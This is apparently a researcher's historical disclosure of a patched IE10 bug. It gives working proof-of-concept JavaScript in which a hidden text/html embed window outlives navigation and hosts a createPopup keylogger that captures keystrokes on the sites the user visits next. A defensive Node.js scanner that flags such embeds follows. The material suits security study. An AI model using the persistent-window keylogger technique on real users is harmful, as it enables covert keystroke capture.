This one surprised me. By creating a hidden <embed type="text/html"> element in a new window, saving a reference to its internal window object, and then navigating the outer window away, the embed’s window persists invisibly. Loading a createPopup keylogger into that hidden window lets it capture keystrokes on whatever site the user navigates to next.
// main page: open a new window, plant a hidden <embed type="text/html">, keep a
// reference to the embed's own window object, then navigate the outer window away
var oHtmlEmbedWin;
function main() {
    var win = window.open("about:blank");
    // IE10 renders an <embed type="text/html"> as an HTML document with its own window object
    win.document.body.innerHTML = '<embed id="HtmlEmbed" type="text/html" src=""></embed>';
    // getSVGDocument() hands back the embed's document; parentWindow is IE's name for its window
    oHtmlEmbedWin = win.document.all.HtmlEmbed.getSVGDocument().parentWindow;
    // navigate the outer window away; the embed's window should be torn down here but is not
    win.location = "http://www.bing.com";
    // one second later, load the popup page into the embed window that is still alive
    setTimeout('oHtmlEmbedWin.location = "popup.html";', 1000);
}

// popup.html: loads a createPopup keylogger that stays on screen
var cp = createPopup(); // IE-only window.createPopup(); the popup is not a normal window
var str = '<div style="font-family:Arial;font-size:12px;color:#ffffff;">' +
    'We are at Bing but we are still alive!<br />' +
    '<span style="font-size:12px;color:red;font-weight:bold;" id="typedText"> </span><br />' +
    '</div>' +
    '<script defer="defer">' +
    // IE exposes the current event as the global "event"; keyCode is the typed character
    ' document.onkeypress = function(){' +
    ' document.all.typedText.innerText += String.fromCharCode(event.keyCode);' +
    ' }' +
    '<\/script>';
cp.document.write(str);
cp.document.close();
cp.document.bgColor = "blue";
// createPopup windows close on most clicks; re-show every second (ignore errors while hidden)
setInterval("try{cp.show(200, 0, 700, 120);}catch(e){}", 1000);
The embed’s window remains alive even after the outer tab navigates to Bing, and the createPopup floats visibly over the page capturing every key. The variation folder contains three additional techniques. In Metro mode createPopup windows do not work, but the resident embed can still fire alerts and prompts. Tested on IE10 Desktop Win8 RTM.
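The hook this bug relies on is an <embed> whose type is text/html, which IE rendered as a full HTML document with its own window object. The browser-side fix is long shipped, but the same element is still a good thing to flag when a site accepts user-supplied HTML. The following is an added example, not code from the original post: a small Node.js scanner (regex-based tag tokenizer, not a full HTML parser, so a triage aid rather than a replacement for a real sanitizer) that lists every <embed> and <object> in a markup fragment and rates an <embed type="text/html"> as high severity. The sample markup is constructed for the example.

```javascript
// Added example (not from the original post): flag plugin/embedding elements in
// user-supplied HTML, with <embed type="text/html"> rated highest because it
// renders HTML inside its own window object (the hook used in the post above).
// Simplified regex tokenizer: good enough for a triage scan, not a sanitizer.

const EMBED_TAG_RE = /<(embed|object)\b([^>]*)>/gi;
const ATTR_RE = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Turn the attribute text of one start tag into a lower-cased name -> value map.
function parseAttributes(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) {
    const value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
    attrs[m[1].toLowerCase()] = value.trim();
  }
  return attrs;
}

// Return one finding per <embed>/<object> start tag found in the markup.
function findRiskyEmbeds(html) {
  const findings = [];
  for (const m of html.matchAll(EMBED_TAG_RE)) {
    const tag = m[1].toLowerCase();
    const attrs = parseAttributes(m[2]);
    const type = (attrs.type || '').toLowerCase();
    const isHtml = tag === 'embed' && type === 'text/html';
    findings.push({
      tag,
      type: type || null,
      src: attrs.src !== undefined ? attrs.src : null,
      severity: isHtml ? 'high' : 'medium',
      reason: isHtml
        ? 'embed of type text/html renders HTML in its own window object'
        : 'plugin/embedding element in user-supplied content',
      offset: m.index,
    });
  }
  return findings;
}

// Constructed sample input: one dangerous embed, one ordinary embed, one object.
const SAMPLE_HTML = [
  '<p>Hello</p>',
  '<embed id="HtmlEmbed" type="text/html" src=""></embed>',
  '<embed type="image/svg+xml" src="logo.svg">',
  '<object data="movie.swf"></object>',
].join('\n');

console.log(JSON.stringify(findRiskyEmbeds(SAMPLE_HTML), null, 2));
```

Run it with `node scan.js`; in practice the scan would sit in a moderation pipeline and any high-severity finding would reject the submission, while medium findings are the candidates a sanitizer allowlist should already be dropping.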
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.